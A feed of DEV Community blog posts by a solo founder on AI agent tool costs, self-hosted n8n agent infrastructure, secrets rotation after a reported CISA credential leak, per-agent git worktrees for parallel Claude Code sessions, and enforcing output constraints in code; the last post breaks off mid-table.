DEV Community: Tobias Koehler

The Real Cost of AI Agents Is Not the Model Bill

Tobias Koehler — Mon, 06 Jul 2026 07:26:04 +0000

The language model call is predictable. You know the token count. You can estimate the cost. The surprise comes from everything the agent calls after the model responds. A single agent action can trigger an external API, a database write, a notification, a webhook, and a storage operation. Each one has its own cost curve. Some charge per-call, some per-record, some per-gigabyte. When an agent loops or retries, every step multiplies.

Why Do AI Agent Bills Surprise People?

Most teams budget for the model. They forget the tools. An agent with access to a paid enrichment API, a CRM write endpoint, and a notification service can rack up charges across three vendors in one run. The model call might cost $0.02. The downstream tool calls cost $0.50. At scale, the model is a rounding error.

The failure mode is simple: an agent with no rate limit and a tool that charges per call is a slow money leak with no natural stopping point. The post on the cost of one unguarded AI API call covers this in detail. The short version is that retry logic without backoff turns a single failed call into five charged calls before the agent surfaces an error.

How Do You Audit Which Tools Your Agents Actually Use?

Start with the tool list, not the code. Most agent frameworks attach tools to an agent at initialization. Read that list. For each tool, answer three questions: does this agent actually need this tool for its assigned task? What is the per-call cost, and what triggers a call? What happens if the agent calls this tool ten times in one run?

The third question catches the loops. An agent that retries a failing tool call without a circuit breaker will call that tool until something external stops it. Define what "external stops it" means before you find out the hard way.

Tool sprawl accumulates faster than most teams expect, especially when agents are built incrementally or configured through an external platform. The post your AI agent has 87 tools you never approved is a useful starting point for understanding how tool lists grow without explicit approval.

What Should an Agent Cost Per Run?

Define a budget per agent run before the agent runs in production. This is not a soft guideline. It is a hard ceiling: if the total cost of all tool calls in one run exceeds the ceiling, the run fails or alerts.

The ceiling forces a question the team usually skips: what is this agent actually worth per invocation? If an agent enriches a lead record, the ceiling should be well below what a converted lead is worth. Without an explicit answer, the ceiling defaults to infinity.

Where Do Costs Hide in a Typical Stack?

The obvious costs are easy to spot. The hidden ones compound quietly until a billing alert fires at 3am. Here are the common hiding places:

Webhook fan-outs. An agent triggers a webhook. The webhook triggers three downstream services, each charging per invocation. The agent run cost looks normal. The downstream bill does not.
Retry logic without backoff. A tool call fails. The agent retries immediately, five times, before surfacing an error. Five calls charged instead of one.
Storage writes on every run. An agent writes intermediate state to object storage. The cost is small per write. At volume, it is not.
Third-party enrichment APIs. These often charge per record. An agent that calls an enrichment API for records it has already enriched is paying twice for the same data.

How Do You Manage Secrets for Tools That Have Per-Call Costs?

Credential management and cost management are the same problem from different angles. An API key with no scope limit gives an agent the ability to call any endpoint that key can reach. A scoped key limits the blast radius of both a security incident and an unexpected billing event.

The post on secrets management for SaaS founders covers the credential side in depth. For cost auditing, the relevant principle is: credentials should be as narrow as the task requires.

What Is the Minimum Viable Cost Audit Before Launch?

A one-hour audit before you go to production is cheaper than the invoice after. Here is the minimum viable checklist:

Tool inventory. List every tool the agent can call. Remove any it does not need.
Per-call cost mapping. For each tool that calls an external service, find the pricing and note the per-call or per-record cost.
Loop and retry audit. Trace every path where the agent could call the same tool more than once. Verify each has a finite bound.
Ceiling definition. Set a maximum cost per run and a maximum run frequency. Alert if either is exceeded.

This takes an hour the first time. It saves the kind of bill that requires an explanation to a co-founder or an investor.

Questions readers often ask

Do these cost risks apply to agents running on a fixed-price platform?

Partially. The platform bill may be fixed, but the tools the agent calls outside the platform are not. An agent that triggers an email send, a CRM update, and a Slack notification on every run is accumulating costs across three external services regardless of what the platform charges.

How often should you re-run the cost audit?

Any time the agent's tool list changes, it is given a new data source, or the run frequency increases. A quarterly review is a reasonable backstop if none of those events are tracked explicitly.

What is the simplest way to cap agent spend without a custom circuit breaker?

Most cloud services and API providers offer account-level spend alerts or hard caps. Set them at the service level, not just in the agent. A bug in the agent's retry logic cannot bypass a hard cap at the provider. Defense at multiple layers beats defense at one.

Should the cost audit happen before or after the security audit?

Run them together. The tool scope question is identical for cost and for security. Narrowing tool access reduces blast radius on both axes at once.

Jensen Says Every SaaS Becomes an Agent Company. I Built Mine for $45/Month on my VPS

Tobias Koehler — Mon, 06 Jul 2026 07:25:51 +0000

NVIDIA CEO Jensen Huang told the world at GTC 2025 that traditional software companies will evolve into agent platforms. He called it the shift from humans using software to AI agents using software on behalf of humans. That is not a research claim. It is a description of what is already happening in production systems.

I run two products on self-hosted infrastructure. ConnectEngine OS automates lead generation, content creation, and uptime monitoring. ProductShot generates AI product photography. Both products run agents that execute multi-step workflows without human intervention. The monthly infrastructure cost is roughly $45 USD. No venture capital. No cloud markup. Just a VPS, Docker containers, and agent orchestration built on n8n.

What Does Jensen Mean by Agent-First Software?

Huang's argument at GTC was structural, not speculative. SaaS requires a human to log in, click buttons, and execute tasks. Agents as a Service (AaaS) flips that model. The agent monitors your pipeline, identifies deals at risk, drafts outreach emails, updates the CRM, and flags the human only when judgment is required. The human becomes the exception handler, not the default operator.

This changes the economics of software. When an agent handles 10,000 tasks per month, you pay for compute and model inference, not 10,000 human hours. Pricing shifts from per-seat to per-task or per-outcome. Availability becomes 24/7 continuous instead of business hours. Scalability means spinning up more agents, not hiring more people.

NVIDIA positioned itself as the infrastructure layer underneath all of this. The company announced NIM (NVIDIA Inference Microservices), pre-packaged containers for running AI models in production. Enterprises can deploy customer-facing agents without managing model infrastructure. Huang also highlighted partnerships with Cadence, CrowdStrike, Dassault Systemes, Palantir, SAP, ServiceNow, Siemens, and Synopsys. These companies are building agents on NVIDIA infrastructure.

How ConnectEngine OS Implements the Agent Model

ConnectEngine OS runs three agent modules. LeadFlow discovers leads from Google Maps, Google Places, Etsy, and e-commerce stores. It scrapes business data, enriches contact information, and scores prospects based on website quality. ContentFlow generates platform-specific content from a single idea, rewrites it for blog, X, LinkedIn, Instagram, and Facebook, verifies claims against sources, and schedules publication. OpsFlow monitors uptime and sends Telegram alerts when sites go down.

These agents run continuously. LeadFlow fires on a schedule, finds new leads, and queues them for outreach. ContentFlow takes an idea, generates five platform-specific drafts, runs a verification pass, and publishes on schedule. OpsFlow pings monitored sites every few minutes and alerts immediately on failure. No human clicks a button to start these workflows. The agents execute autonomously.

The architecture is self-hosted n8n for workflow orchestration, Supabase for the database with Row Level Security enforced from day one, and Docker containers on a Hetzner VPS. Multi-tenancy is built into the schema. Each client's data is isolated via RLS policies. Credentials are stored in a vault with per-client API keys. Notifications route to Telegram or Slack depending on client preference.

Why Self-Hosting Beats Managed Platforms for Agent Infrastructure

The monthly cost for running both products is roughly $45 USD. That includes the VPS, offsite backups, and DNS. No per-execution fees. No per-seat licensing. No cloud markup on compute. The agent workflows run as often as needed without incrementing a bill.

Managed automation platforms charge per execution or per task. When an agent runs 10,000 operations per month, those fees compound. Self-hosting eliminates that variable cost. The infrastructure cost is fixed. The marginal cost of adding another workflow or another client is near zero.

Control is the other advantage. The n8n instance runs inside Docker on the VPS. Workflow JSON is versioned in git. Credentials are environment variables, never hardcoded. Backups run nightly to offsite storage. There is no vendor lock-in. The entire stack can be migrated to a different provider in hours if needed.

What the Shift to Agents Means for SaaS Founders

Huang's prediction is already visible in production systems. Salesforce ships Agentforce. ServiceNow ships AI agents. Vertical-specific platforms are selling agent capabilities as core features. The companies that adapt early will have a structural cost advantage over those that continue to sell per-seat software.

The technical barrier is lower than it appears. Open-source orchestration tools like n8n handle the workflow layer. Supabase provides a multi-tenant database with built-in auth and RLS. Claude and OpenAI provide the reasoning layer via API. The infrastructure cost is minimal if you self-host. The hard part is designing workflows that execute reliably without human intervention.

Start with one repeatable workflow. Identify a task your users perform manually every day. Build an agent that executes that task autonomously. Test it in production. Iterate until it runs without errors for a week straight. Then add the next workflow. Agent-first software is not a rewrite. It is an incremental shift from human-initiated actions to autonomous execution.

Questions readers often ask

Q: What is the difference between SaaS and Agents as a Service?

SaaS requires a human to log in and execute tasks. Agents as a Service means the agent performs the work autonomously and only escalates to a human when judgment is required. The pricing model shifts from per-seat to per-task or per-outcome.

Q: Can you build agent infrastructure without venture funding?

Yes. Self-hosted n8n on a VPS costs roughly $45 per month. Open-source tools handle orchestration, multi-tenancy, and auth. The marginal cost of adding workflows is near zero. Cloud platforms charge per execution, which compounds at scale.

Q: What is the biggest technical challenge in building agent workflows?

Reliability. Agents must execute without human intervention for days or weeks at a time. That requires error handling, retry logic, and monitoring at every step. The workflow must degrade gracefully when external APIs fail or rate limits are hit.

Q: How do you handle multi-tenancy in a self-hosted agent platform?

Row Level Security in Supabase isolates each client's data at the database level. Every query is scoped to the authenticated user's client ID. Credentials are stored in a per-client vault. Notifications route to the correct Telegram or Slack channel based on client configuration.

Q: What did Jensen Huang say about the future of enterprise software?

Huang said the era of humans using software is giving way to AI agents using software on behalf of humans. He positioned NVIDIA as the infrastructure layer for this shift and highlighted partnerships with SAP, ServiceNow, Palantir, and others building agents on NVIDIA infrastructure.

I'm rotating three of my own secrets this week. Three keys ended up where they didn't belong, I caught it fast, and I have a ...

Tobias Koehler — Sun, 07 Jun 2026 02:18:52 +0000

What finally made me stop procrastinating on it was reading about the CISA leak.

A contractor for the Cybersecurity and Infrastructure Security Agency maintained a public GitHub repository called "Private-CISA" that exposed administrative credentials to three AWS GovCloud accounts, dozens of plaintext passwords, and internal deployment configs [S1]. It was created on November 13, 2025, and stayed public until security researchers flagged it on May 15, 2026 [S1]. That's six months. This wasn't a sophisticated attack. Someone disabled GitHub's default secret detection, committed files named "importantAWStokens" and "AWS-Workspace-Firefox-Passwords.csv," and left them open to anyone with an internet connection [S1].

Guillaume Valadon from GitGuardian called it "the worst leak that I've witnessed in my career" [S1]. Philippe Caturegli from Seralys confirmed the credentials could authenticate to three AWS GovCloud accounts at a high privilege level and reach CISA's internal artifactory, the repository of every code package used to build their software. The keys stayed valid for 48 hours after the repo was taken offline.

If this can happen to a federal cybersecurity agency, it can happen to your SaaS. The difference is you don't have a security team to clean up after you. You have you, at night, rotating keys.

Why early-stage founders get this wrong

We treat secrets management as a future problem. You're shipping fast, the team is one or two people, everyone has admin anyway. A Stripe key in a .env file feels harmless when two people touch the codebase.

It doesn't stay harmless. Research cited by secrets management platforms found 96% of organizations have secrets scattered across code, config files, and multiple environments [S3]. Toyota, Mercedes-Benz, government institutions, and modern tech companies have all leaked credentials on GitHub [S2]. The CISA contractor used the repo as a working scratchpad, syncing backups and credentials across environments, and many passwords followed a pattern of the platform name plus the current year [S1]. Every one of those was a shortcut that felt reasonable in the moment and became indefensible once it was public.

For a SaaS holding customer data, a single leaked database credential or API key can mean direct access to production data, the ability to impersonate your app to third-party services, mandatory breach notifications, and the reputational hit that ends early traction. Organizations that automate detection cut breach costs by $1.9 million on average [S3]. I am not at that scale, and I still don't want to be the cautionary tweet.

Automated scanning is the cheapest thing you'll do all month

The CISA contractor explicitly disabled GitHub's default setting that blocks publishing keys in public repos [S1]. That's removing the safety from a loaded gun. Scanning tools exist to catch exactly this.

git-secrets, trufflehog, and GitGuardian scan repos for patterns that match API keys, tokens, certificates, and other credentials [S2]. Wired into your pipeline, they block commits with secrets before those commits ever reach the remote. Here's the basic setup I'd start with.

Install git-secrets locally:

git clone https://github.com/awslabs/git-secrets
cd git-secrets
make install

Wire it into your repo:

cd /path/to/your/repo
git secrets --install
git secrets --register-aws

That adds pre-commit hooks that scan for AWS credentials. Add custom patterns for broader coverage, then add a scanning step to your CI/CD pipeline so every pull request is checked and merges are blocked when a secret is found. The point is that it's automatic. Manual review fails because humans miss things when they're moving fast. I missed something when I was moving fast. That's the whole reason I'm writing this.

Stop secrets from existing in your code at all

Scanning catches accidental commits. Proper storage means the secret was never in the code to begin with. The CISA repo held plaintext credentials in CSV files and config backups [S1]. Those should never be committed, even to a private repo.

Environment variables are the baseline. Instead of hardcoding a key in source, read it from process.env and keep the real value in a .env file that's listed in your .gitignore. That works locally but doesn't solve distribution: how do you get secrets to teammates, staging, and production without DMing them or committing them?

Secret management services. AWS Secrets Manager, Doppler, and similar tools encrypt secrets at rest, give you audit logs, and integrate with your deploys [S2] [S3]. Your app fetches them at runtime instead of you copying credentials onto every server. Credentials never touch your codebase or your laptop. And rotation, the thing I'm doing this week, becomes trivial: update the value in the manager, restart the app. No code change, no redeploy. If I'd had every one of these three keys behind a manager from the start, this week would be a thirty-second job instead of a careful, backup-first cycle.

For an early product this feels like overkill. It isn't. Setting up a secret manager takes an afternoon. Cleaning up a leak takes weeks and costs trust you can't spare.

The repo audit checklist I'm running on myself

If you've ever committed a secret, it's still in your Git history after you delete it. Every commit is permanent unless you explicitly remove it. Here's the checklist.

Scan the full history, not just current files with trufflehog's filesystem mode. Review the output for API keys, tokens, passwords, and connection strings.
Check for common secret files: .env variants, config.json, secrets.yml, credentials.csv, id_rsa, *.pem, *.key, and database backups (*.sql, *.dump).
Verify your .gitignore covers them (.env*, *.pem, *.key, secrets configs).
Rotate anything you find. If it was in history, assume it's compromised. The CISA keys stayed valid for 48 hours after the repo came down [S1]. That window is real, which is exactly why I'm doing my rotation with a backup in place instead of yanking everything at once.
Remove secrets from history with BFG Repo-Cleaner or git-filter-repo, then force-push and tell anyone with a local clone to re-clone.
Enable GitHub secret scanning. It scans public repos for known patterns automatically; turn it on for private repos too. The CISA contractor disabled it [S1]. Don't.

How any one of these would have stopped CISA

The breach was preventable at five separate points. If the contractor had left GitHub's secret detection on, the platform would have blocked the keys [S1]. If they'd used environment variables instead of committing CSVs, the credentials wouldn't have existed in the repo [S1]. If they'd stored secrets in a manager, the "importantAWStokens" file would have been unnecessary [S1]. A pre-commit hook would have caught it locally [S2]. A routine audit would have flagged the public repo [S3].

Caturegli identified the exposed artifactory credentials as a prime target for lateral movement and backdooring software packages [S1]. None of the fixes above need an enterprise budget or a security team. They need you to treat secrets as the high-value targets they are.

What this means if you hold customer data

Customers trust you with their data before you've earned it. One leaked credential that exposes user information ends that trust for good. SOC 2, GDPR, and HIPAA all require secure credential management [S3], so failing an audit because a key was committed to GitHub is an unforced error.

The good news: the work is front-loaded and cheap. Scanning tools are free. Secret managers have generous free tiers. You set it up once and maintain it as part of normal development.

The CISA repo was public for six months and granted admin access to federal cloud infrastructure [S1]. Your startup can't survive six days of that. I'm spending this week rotating three keys because I'd rather do the boring fix now than write the apology email later. If you've been putting your own rotation off, the CISA leak is your reminder too. See how I build ConnectEngine in the open.

Give Every AI Agent Its Own Git Worktree

Tobias Koehler — Sun, 07 Jun 2026 01:51:50 +0000

I ran five Claude Code agents in parallel one morning this week. By the time the dust settled I'd had three separate git collisions, one branch with two unrelated tabs' commits tangled together, and a recovery that needed a force-push I had to explicitly approve. Everyone's work survived. But the lesson cost me an hour I didn't plan to spend, and it comes down to a single file.
This is a follow-up to the seven-PRs-before-lunch morning. That post was the highlight reel. This one is the bug I hit running the same pattern without one rule in place.

The setup

The parallel-tab pattern looks like this: one coordinator tab holds the day's context and makes merge decisions, and several satellite tabs each carry one scoped piece of work. That morning I had five satellites going — Phase 2 of a content feature, Phase 3 of another, a Stripe doc fix, a Supabase security pass, and an investigation tab chasing a separate bug.
Two of those tabs were dispatched correctly: each got its own git worktree, a separate working directory linked to the same repository. The other two were not. They both ran their git commands inside the shared main checkout, because the work seemed small enough not to bother.
That shortcut is where it went wrong.

What actually broke

Three collisions, in order:
One. A satellite tab made its first commit — and it landed on a different tab's branch. The other tab had run git checkout -b mid-task, which moved the shared HEAD, and the committing tab never knew. Recovery was a --mixed reset back to the right commit, then re-separating the branches. The misplaced work was preserved, but only because I caught it before pushing.
Two. The Stripe-fix tab ran git checkout -b fix/stripe-checklist-doc-rot and moved the shared HEAD again. The security tab's next commit then landed on the Stripe branch. The remote branch ended up with two unrelated commits stacked on it — the security work and the doc fix — entangled on a branch that was supposed to hold one trivial change. Untangling it needed:

git rebase --onto db0f96c 93d66ce
git push --force-with-lease

A force-push is destructive. My own rule is that those need an explicit go-ahead, so the recovery stopped and waited for me before it touched the remote.
Three. While recovering, the security tab had to inspect the Stripe tab's working tree just to understand what had gotten mixed in. Two agents reading each other's uncommitted state to reconstruct who did what.
None of this was the model being dumb. Every individual command was correct. The problem was the environment they all shared.

The technical heart: it's one file

Here's the whole thing in one sentence. .git/HEAD is a single file, and there's one of it per checkout.
Every tab that cds into the same directory reads and writes that same file. So:

Tab A runs git checkout branch-a. HEAD now points at branch-a.
Tab B, in a different terminal but the same directory, runs git status. It sees branch-a — not whatever it thinks it's on.
Tab B commits. The commit lands on branch-a. There's no race condition exotic about it. It's git working exactly as designed. A checkout is shared mutable state, and I had five agents writing to it concurrently. Parallel processes plus shared mutable state is the oldest bug in the book; I'd just never hit it with git because humans don't usually run five checkouts in one directory at the same time. Git already ships the fix. Worktrees give each agent its own working directory and its own HEAD, all linked to the same object store:

git worktree add ../wt-stripe-fix -b fix/stripe-checklist-doc-rot origin/main

Now that tab has a private directory, a private HEAD, and a private checked-out branch. It cannot move another tab's HEAD because it isn't touching the same one. The two tabs I had set up with worktrees that morning had zero collisions. The two I didn't accounted for all three.

The numbers

Metric	That morning
Parallel agents running	5
Tabs given their own worktree	2
Tabs sharing the main checkout	3
Collisions from the isolated tabs	0
Collisions from the shared tabs	3
Recoveries needing a force-push	1

The split is the entire argument. Zero from isolation, three from sharing. There was no middle ground and no "it's a small change so it's fine."

The rule

So the rule is now absolute, and it has no exceptions:
Every satellite agent gets its own git worktree. No exceptions — not even a three-line doc fix.
The Stripe fix that caused collision two was a three-line doc fix. That's exactly why "this one's too small to bother" is the trap. The size of the change has nothing to do with it. The git checkout -b moves the shared HEAD whether the diff is three lines or three hundred.
Two mechanical guardrails enforce it now:

The coordinator's dispatch prompt always includes a worktree-setup block with the exact git worktree add command. The agent doesn't get to decide whether it needs one.
Every satellite's first step is git rev-parse --show-toplevel. If that returns the shared main path instead of its own wt-* directory, the agent halts and says "shared worktree detected" before it commits anything. The check is a few seconds. The collision it prevents is an hour. The coordinator tab itself stays in the main checkout — that's safe, because the coordinator's job is merging and docs, and it never creates feature branches there. Isolation is for the tabs doing branch work. This is the same shape as a lesson I keep relearning: a rule that lives only as good intentions gets violated the moment something seems small. The fix is never "remember to be careful." It's to make the safe path the only path the tooling offers. That's why the dispatch prompt carries the command and the first step is a hard check — the discipline moved out of my memory and into the process, the same way I moved my whole operating manual from prose into structure a couple of weeks back. ## The pattern, if you're running parallel agents
One worktree per agent, always. git worktree add ../wt- -b origin/main. The shared store keeps it cheap; the separate HEAD keeps them from fighting.
Make the first action a location check. git rev-parse --show-toplevel as step one. Wrong directory means halt, not proceed-and-hope.
Clean up at the end. git worktree remove and git branch -D once merged, so the next session starts clean. Running agents in parallel multiplies your throughput. It also multiplies every shared-state bug you'd never trip as a single human at a single checkout. The worktree isn't an optimization. It's the isolation boundary that makes the parallelism safe at all. Five agents, one HEAD, three collisions. Five agents, five HEADs, zero. Give every agent its own worktree. --- I build ConnectEngine OS in production, in public, most mornings. The scan tool is free if you want to see what it does.

You Can't Prompt Your Way Out of a Hard Constraint

Tobias Koehler — Fri, 29 May 2026 08:24:15 +0000

Thursday morning I removed five nodes from my content pipeline. By lunch I understood something about building with language models that eleven failed edits had been trying to teach me all week: when a rule absolutely has to hold, you don't write the rule into the prompt. You enforce it in code.
This is a field report from the inside of the AI content engine I built in n8n. It's not a hot take about prompt engineering. It's the specific, expensive way I learned where prompts stop working — and what to do instead.

The setup

ConnectEngine OS has a module called ContentFlow. You give it a topic, it grounds itself in real sources, and it writes platform-specific posts: a blog draft, a LinkedIn version, an X version, Facebook, Instagram, plus a matching image prompt. One idea in, six shaped outputs out.
For weeks there had been a verifier stage in the middle — a fact-check node that re-read every claim against the cited sources. It was slow and it was noisy, so on Thursday I split it out and removed it from the generation path. The workflow went from 36 nodes to 31. Cleaner. Faster.
Then I regenerated an idea to smoke-test the change, and every platform output came back wrong.
X was over 5,000 characters against a 270 limit. LinkedIn and Instagram had markdown # headers that those platforms explicitly don't render. Everything read like a blog post regardless of which platform it was for. The image prompt field was stuffed with the article body instead of a visual description. When I checked the backlog, 21 of 45 ideas were affected — 47% of everything in the pipeline.
My first reaction was the wrong one: what did removing the verifier break?

The technical heart

It hadn't broken anything. The verifier removal was innocent. What it did was stop hiding a bug that had been there the whole time.
Here's the part that matters. The node that calls the model assembles a system prompt that's roughly 49KB. That's not a typo. It's the platform's format rules, plus the full grounding context — the primary source (~6KB), three separate search-result bodies (~4KB each), the citation-formatting rules, the founder voice profile, and the per-platform instructions. All concatenated into one instruction block.
Inside that 49KB sits a single line that says, in effect, "X posts must be under 270 characters, no markdown headers." And the model ignores it.
Not maliciously. The grounding context is the overwhelming bulk of those tokens, and it's full of concrete, specific article content. A single formatting sentence floating in that ocean doesn't get the model's attention. The signal is swamped.
The actual root cause was even more direct: an upstream node was writing each idea's raw_idea as an imperative instruction ("write a comprehensive guide to..."), and that instruction was passed verbatim into the user message. The model obeyed the imperative it was handed over the format rules buried in the system prompt. Same story for the image prompt — it was told to write an article, so it wrote an article into the image field.

Eleven edits, and a pattern I couldn't ignore

So I did what most people do. I tried to fix it with better instructions.
| Fix attempt | Mechanism | Outcome |
|---|---|---|
| Topic-reframe in the user message | prompt | Partial — stopped the imperative echo, lengths still wrong |
| End-of-prompt "final reminder" with hard char limits | prompt | Partial — LinkedIn 4550 → 2896, Facebook 1789 → 691, but X and LinkedIn still over |
| "Default to a single tweet, not a thread" rule | prompt | Ignored — still produced a 3-tweet thread |
| "Don't write source stories in the first person" rule | prompt | Ignored — still wrote a borrowed "$257/month" story as mine |
| Re-splitter: break long output into ≤270-char tweets at sentence boundaries | code | Works — X is postable no matter what the model emits |
| Character gate with an X exemption | code | Works |
| Brand-aware image fallback (read brand config, build the prompt from a template) | code | Works — images stay on-brand even when generation misfires |
| Image guard: discard anything with # headers or over 400 chars | code | Works — article bodies never reach the image field |
Read that table top to bottom. Every prompt-level fix was partial or flatly ignored. Every code-level fix worked the first time and kept working.
By the eleventh edit I stopped pretending the next instruction would be the one that stuck. The lesson wasn't "write the rule more forcefully." The lesson was that I'd been using the wrong tool for the job.

The numbers

Metric	Value
Grounding context per generation	~49KB
Prompt-level fix attempts (E1–E11)	11
Prompt fixes that fully held	0
Code-level fixes that held	4
Ideas affected by the unmasked bug	21 of 45 (47%)
Platforms posting correctly after the fix	5 of 6

Zero out of eleven on one side. Four out of four on the other. When the data is that lopsided, it isn't telling you to try harder. It's telling you the category is wrong.

The lesson

Here's the rule I walked away with, and it's now how I build every model-backed feature:
Use the prompt for the generative task. Use code for the hard constraints.
The prompt decides what to write about, the voice, the tone, the angle. That's what language models are extraordinary at, and you should let them cook. But the moment a requirement must hold — a character limit, a banned markdown token, a brand color in an image, a field that must never contain an article body — that requirement does not belong in the prompt. It belongs in a post-processor, a re-splitter, a deterministic truncation at a sentence boundary, a validation gate, a template you interpolate into. Something that runs in code, after the model, and cannot be argued with.
This is the same shape as a lesson I keep relearning across the whole product. When I rewrote 16 plan documents from scratch, the takeaway was "plans rot faster than code because plans have no CI." A prompt instruction is a plan. Code is the CI. If the constraint has no enforcement below the layer that can ignore it, it will eventually be ignored.

The honest gaps

I'm not going to pretend it's all solved. Five of six platforms post correctly now and the images came out genuinely good — idea-specific and on-brand. But:

X still wants to write threads. The prompt rule asking for a single tweet is ignored; the re-splitter makes the thread postable, but it's still a thread. That's a product decision I haven't made yet, not a bug I've fixed.
LinkedIn occasionally trips its own publish gate because the Unicode-bold formatting uses surrogate-pair characters that count as two each in a naive length check. The fix is to count code points, not string length — another deterministic code fix, queued.
The real root lever is the 49KB itself. Trimming the grounding context would reduce the dominance that causes all of this. I'm holding off, because shrinking the source bodies re-opens an older bug where the model invents list endings when it's given too little to work with. That's a genuine tradeoff I haven't resolved, and I'd rather say so than pretend the architecture is finished. There's also a sharper edge here than formatting. One of the ignored rules was "don't write a source's story in the first person." The model kept taking a number it read in a source article and presenting it as my own experience. For a founder writing under his own name, that's not a formatting miss — it's an honesty problem. And the durable fix for that one isn't a post-filter at all. It's feeding the pipeline my real stories instead of asking it to rewrite someone else's. Which, transparently, is exactly what this post is. ## The pattern, if you're building with models Three things to take from a week I'd rather have spent shipping features:
Audit where your constraints actually live. If the only thing standing between your output and a hard requirement is a sentence in a prompt, you don't have a constraint — you have a suggestion. Find every "must" in your prompts and ask which ones have code behind them.
Watch for signal drowning in scale. A rule that worked in a 2KB prompt can quietly stop working when that prompt grows to 49KB and fills with concrete content. More context makes generation better and makes instruction-following worse. Budget for that.
When a fix is partial three times, change categories. Partial-partial-partial is the model telling you the lever doesn't reach. Stop adding prompt text and move the requirement into deterministic code. This connects directly to the context-architecture work I did two weeks ago — the whole reason I think in token budgets and signal-to-noise now — and it's the kind of thing the parallel-tab debugging setup was built to chase down quickly. The compounding is real: every time I learn where a model's attention gives out, the next feature gets a deterministic guardrail instead of a hopeful instruction. Prompts are for what to say. Code is for what must be true. --- I build ConnectEngine OS in production, in public, most mornings. The scan tool is free if you want to see what it does.

Seven PRs Before Lunch: Parallel Claude Code Tabs Plus Audit-Before-Bump

Tobias Koehler — Mon, 25 May 2026 03:31:39 +0000

Two weeks ago I rebuilt my Claude Code context architecture. Cut CLAUDE.md from 14K tokens to 2.4K. Moved 12 stable rule sets into skills that load on demand. Replaced 245K tokens of /os startup reads with a hook that injects compact state in about 5K. The math was clean: fresh /clear context burn dropped 94%.
This morning that math turned into output.
Between 06:24 and 09:00 +07, four Claude Code tabs plus one Codex CLI session plus a coordinator tab shipped seven pull requests to production. Both repositories deployed live, twice. Hotfixes patched. AGENTS.md refreshed. Vault synced. Tuesday brief written with three ready-to-fire prompts for tomorrow.
The original plan called this a one-week scope. I was done with half of it before breakfast finished.

The setup

ConnectEngine OS ships through paired sessions. The pattern that emerged over the last few weeks looks like this:

Tab 1 — main coordinator, holds the day's context, makes merge decisions, owns docs hygiene
Tabs 2–5 — satellite Claude Code sessions, each carries one scoped piece of work in its own git worktree
Codex async — fire-and-forget for deterministic find/replace work where a human-in-the-loop wastes attention The unlock isn't "more tabs." The unlock is each tab loading the smallest context it needs and surfacing back to the coordinator with paste-ready relay blocks. Less re-explanation across tabs. Less context drift. Less of me asking "wait, what was this tab doing again." This morning Tab 1 (me) coordinated:
Codex Tab A — CE OS Phase B token migration: introduce --font-size-xxs/xxxs, migrate direct var(--*) consumption to semantic Tailwind aliases, standardize green/amber families
Codex Tab B — same migration on the marketing site repo
Claude Tab C — Phase D-Landing kit: six Level 4 primitives (Hero, BentoGrid, MultiSelectShowcase, MegaMenuNav, LogoMarquee, CTASection) plus a noindex /test-landing route
Claude Tab D — Phase D-Dashboard polish wave 1: thirteen Settings loaders standardized to a Skeleton primitive, three new shared components/ui/* primitives (skeleton, empty-state, upgrade-to-unlock-cta), mobile tab nav collapses to a native Select under 640px
Claude Tab E — Next.js 14.2 → 16 plus next-intl 3 → 4 migration on the marketing site Five satellite tabs. One Tab 1 to keep them moving without colliding. ## The audit that collapsed two days into ten minutes Tab E's brief estimated 1–2 days paired for the framework migration. Major version bumps usually carry that cost: async params, async cookies, runtime semantic changes, the next-intl 4 breaking API surface. Tab E ran a S1 inventory audit before bumping anything. Five minutes later it surfaced this:
i18n/request.ts already had the next-intl 4 shape: await cookies(), await headers(), explicit locale return.
next.config.js already used the new createNextIntlPlugin v4 wiring.
Four of five dynamic-route files already used params: Promise plus await params.
All searchParams pages used the client useSearchParams() hook, which is unchanged in Next 16. The codebase was about 90% pre-migrated. Earlier work, mostly incidental, had landed the breaking-change patterns piece by piece without anyone calling it a "migration." Real remaining scope: one file change (app/api/og/[slug]/route.tsx, sync params → async, two lines), plus two version bumps in package.json, plus a tsconfig.json adjustment Next 16 requires, plus a freshly tracked package-lock.json for reproducibility. Tab E shipped that as a four-file commit. Build green via dummy-credentials build: 28 routes compiled, 1,855ms compile time, 14.2s static generation. Deployed live the same morning. A "1–2 day" migration collapsed to about two lines of new code. The lesson is the audit, not the result. If I had told Tab E "just bump and migrate," it would have changed five files instead of one, refactored four already-correct routes, possibly broken something subtle, and definitely spent the full day estimate doing it. The audit cost ~30 minutes. The savings were the rest of the day. That same pattern now belongs in every framework-version-bump tab spec going forward. Audit first. Inventory the breaking-change patterns. Surface the delta. Then decide if the work is hours or days. ## The hotfixes that production caught (and what they cost) Two production-only bugs surfaced after the morning's first deploy. Both came from honest verification gaps that the satellite tabs declared in their PR bodies up front: "no compile, no Lighthouse — Docker-only build per CLAUDE.md." Those gaps are real. The cost showed up at rebuild time. Hotfix 1: a JSDoc comment closed itself. The new upgrade-to-unlock-cta.tsx primitive had a docblock describing the component pattern. One line referenced a glob path: app/dashboard/*/page.tsx. The substring */ inside the /** */ comment closed the comment block prematurely. Everything after became invalid JavaScript. Turbopack failed parse during rebuild with Expected ';', '}' or. Replacing the */ with / (angle-bracket placeholder convention) fixed it in one character. Hotfix 2: Tailwind quietly purged my new utilities. The landing kit lives at a new root-level landing/ directory peer of components/ and lib/. Tailwind's content array only scanned pages/components/app/src. Any utility class unique to the landing files got JIT-purged at build time. The mega-menu's w-[34rem] arbitrary value dropped, panel collapsed to about 50px wide, content squished to one character per line. The logo row's gap-x-8 dropped, integration labels rendered as a single concatenated string. Standard classes used elsewhere in the codebase still worked, which made the bug harder to spot in review — only the landing-only classes vanished. Fix: add './landing/**/*.{ts,tsx}' to the Tailwind content array. Both fixes were under a minute once diagnosed. The cost was the rebuild cycle Tobias had to re-run each time, plus the trust hit of "wait, why does this look broken on production." The honest verification gap is real cost. When a tab declares "no compile, no Lighthouse" up front, that's accurate, but it's not free. Two such gaps in one rebuild cycle this morning was the lesson. Going forward, pre-merge for any PR that introduces new shared primitives or new top-level directories should run a compile gate via Codex worktree (which has node_modules installed). A 30-second TypeScript pass would have caught Hotfix 1. A build smoke would have caught Hotfix 2. Both are now logged as lessons. ## The numbers | Metric | This morning | |---|---:| | Wall-clock | ~3 hours (06:24 → 09:00 +07) | | Pull requests merged | 7 | | Production hotfixes | 2 | | Repositories deployed | 2 (both deployed twice) | | Major framework version bumps | 1 (Next 14 → 16 on marketing site) | | New shared UI primitives shipped | 3 (skeleton, empty-state, 